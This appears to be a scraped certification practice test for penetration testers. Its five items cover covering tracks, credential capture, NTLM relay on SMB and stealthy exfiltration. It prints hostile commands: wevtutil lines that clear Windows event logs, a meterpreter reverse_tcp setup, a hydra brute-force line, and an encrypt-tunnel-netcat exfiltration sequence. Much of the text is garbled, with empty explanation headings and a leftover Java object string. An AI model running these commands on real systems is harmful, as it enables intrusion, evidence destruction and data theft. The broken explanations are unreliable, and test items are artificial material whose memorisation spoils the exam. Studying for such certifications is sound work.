PT0-003 Free Practice Test

During a security assessment, a penetration tester gains access to an internal server and manipulates some data to hide its presence. Which of the following is the best way for the penetration tester to hide the activities performed?

1. A. Clear the Windows event logs.
2. B. Modify the system time.
3. C. Alter the log permissions.
4. D. Reduce the log retention settings.

Correct Answer: A
During a penetration test, one of the critical steps for maintaining access and covering tracks is to clear evidence of the attack. Manipulating data to hide activities on an internal server involves ensuring that logs and traces of the attack are removed. Here's a detailed explanation of why clearing the Windows event logs is the best method for this scenario:
✑ Understanding Windows Event Logs: Windows event logs are a key forensic
artifact that records system, security, and application events. These logs can provide detailed information about user activities, system changes, and potential security incidents.
✑ Why Clear Windows Event Logs:
✑ Method to Clear Event Logs:
shell
Copy code wevtutil cl System wevtutil cl Security
wevtutil cl Application
✑ uk.co.certification.simulator.questionpool.PList@6126ce2a
✑ Alternative Options and Their Drawbacks:
✑ Case References:
In conclusion, clearing Windows event logs is a well-established practice for hiding activities during a penetration test. It is the most effective way to remove evidence of the attack from the system, thereby maintaining stealth and ensuring that the tester's actions remain undetected.
=================

A penetration tester enumerates a legacy Windows host on the same subnet. The tester needs to select exploit methods that will have the least impact on the host's operating
stability. Which of the following commands should the tester try first?

1. A. responder -I eth0 john responder_output.txt <rdp to target>
2. B. hydra -L administrator -P /path/to/pwlist.txt -t 100 rdp://
3. C. msf > use msf > set msf > set PAYLOAD windows/meterpreter/reverse_tcp msf > run
4. D. python3 ./buffer_overflow_with_shellcode.py 445

Correct Answer: A
Responder is a tool used for capturing and analyzing NetBIOS, LLMNR, and MDNS queries to perform various man-in-the-middle (MITM) attacks. It can be used to capture hashed credentials, which can then be cracked offline. Using Responder has the least impact on the host's operating stability compared to more aggressive methods like buffer overflow attacks or payload injections.
✑ Understanding Responder:
✑ Command Breakdown:
✑ Why This is the Best Choice:
✑ References from Pentesting Literature: Step-by-Step ExplanationReferences:
✑ Penetration Testing - A Hands-on Introduction to Hacking
✑ HTB Official Writeups
=================

Which of the following components should a penetration tester include in an assessment report?

1. A. User activities
2. B. Customer remediation plan
3. C. Key management
4. D. Attack narrative

Correct Answer: D
An attack narrative provides a detailed account of the steps taken during the penetration test, including the methods used, vulnerabilities exploited, and the outcomes of each attack. This helps stakeholders understand the context and implications of the findings.
✑ Components of an Assessment Report:
✑ Importance of Attack Narrative:
✑ References from Pentesting Literature: Step-by-Step ExplanationReferences:
✑ Penetration Testing - A Hands-on Introduction to Hacking
✑ HTB Official Writeups
=================

A tester runs an Nmap scan against a Windows server and receives the following results:
Nmap scan report for win_dns.local (10.0.0.5) Host is up (0.014s latency)
Port State Service 53/tcp open domain 161/tcp open snmp 445/tcp open smb-ds 3389/tcp open rdp
Which of the following TCP ports should be prioritized for using hash-based relays?

1. A. 53
2. B. 161
3. C. 445
4. D. 3389

Correct Answer: C
Port 445 is used for SMB (Server Message Block) services, which are commonly targeted for hash-based relay attacks like NTLM relay attacks.
✑ Understanding Hash-Based Relays:
✑ Prioritizing Port 445:
✑ Execution:
✑ References from Pentesting Literature: Step-by-Step ExplanationReferences:
✑ Penetration Testing - A Hands-on Introduction to Hacking
✑ HTB Official Writeups
=================

A penetration tester discovers data to stage and exfiltrate. The client has authorized movement to the tester's attacking hosts only. Which of the following would be most appropriate to avoid alerting the SOC?

1. A. Apply UTF-8 to the data and send over a tunnel to TCP port 25.
2. B. Apply Base64 to the data and send over a tunnel to TCP port 80.
3. C. Apply 3DES to the data and send over a tunnel UDP port 53.
4. D. Apply AES-256 to the data and send over a tunnel to TCP port 443.

Correct Answer: D
AES-256 (Advanced Encryption Standard with a 256-bit key) is a symmetric encryption algorithm widely used for securing data. Sending data over TCP port 443, which is typically used for HTTPS, helps to avoid detection by network monitoring systems as it blends with regular secure web traffic.
✑ Encrypting Data with AES-256:
Step-by-Step Explanationopenssl enc -aes-256-cbc -salt -in plaintext.txt -out encrypted.bin
-k secretkey
✑ Setting Up a Secure Tunnel:
ssh -L 443:targetserver:443 user@intermediatehost
✑ Transferring Data Over the Tunnel: cat encrypted.bin | nc targetserver 443
✑ Benefits of Using AES-256 and Port 443:
✑ Real-World Example:
✑ References from Pentesting Literature: References:
✑ Penetration Testing - A Hands-on Introduction to Hacking
✑ HTB Official Writeups
=================